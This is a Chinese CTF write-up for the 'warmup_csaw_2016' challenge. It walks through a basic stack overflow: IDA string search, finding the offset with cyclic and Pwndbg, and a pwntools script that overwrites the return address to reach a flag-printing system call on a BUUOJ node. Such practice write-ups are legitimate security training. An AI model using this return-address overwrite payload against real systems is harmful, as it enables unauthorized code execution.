本题利用了较为基础的一个栈溢出来获取系统权限

首先我们打开IDA进行分析,搜索字符串我们可以看到有cat flag.txt的关键字样

Pwn-warmup_csaw_2016 writeup

 

进入跟踪,我们可以看到,程序调用了system命令

Pwn-warmup_csaw_2016 writeup

 

首先我们用cyclic创建一个200字符的字符串,利用它来判断溢出点到返回地址的偏移

Pwn-warmup_csaw_2016 writeup

 

 启动Pwndbg进行调试

Pwn-warmup_csaw_2016 writeup

 

 由图可得,根据小端序,'saaa'之前有多少个字符,就是偏移量

Pwn-warmup_csaw_2016 writeup

 

 写出脚本

from pwn import*
p=remote('node3.buuoj.cn',29184)#根据靶机不同来进行更改
addr=0x40060d
payload='a'*72+p64(addr)
p.sendline(payload)
p.interactive()

 打通服务器,拿到flag

Pwn-warmup_csaw_2016 writeup

相关文章:

  • 2021-05-09
  • 2021-06-28
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-11-04
  • 2021-09-14
猜你喜欢
  • 2021-08-17
  • 2021-12-05
  • 2021-05-13
  • 2021-06-03
  • 2021-12-29
  • 2021-11-06
  • 2021-09-06
相关资源
相似解决方案